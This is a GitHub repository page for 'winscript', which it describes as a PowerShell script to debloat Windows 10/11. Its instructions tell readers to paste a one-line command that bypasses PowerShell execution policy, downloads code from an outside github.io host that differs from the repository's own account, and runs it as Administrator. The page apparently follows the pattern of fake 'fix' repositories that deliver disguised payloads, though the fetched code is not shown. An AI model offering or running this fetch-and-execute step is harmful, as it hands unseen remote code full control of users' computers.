Skip to content

PowerShell script to fix Windows 10/11.

License

Notifications You must be signed in to change notification settings

sb-54/winscript

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

winscript

This is a script to debloat Windows 10/11 by removing default apps, disabling services, and making privacy-related tweaks. My work is the culmination of weeks of coding and optimization. Please read this to learn more about the script.

Instructions

To run this script, press Win+R, paste this

powershell -ep bypass -c "iwr https://frahnklin.github.io/win | iex"

and press Shift-Ctrl-Enter to run as Administrator.

About

PowerShell script to fix Windows 10/11.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 100.0%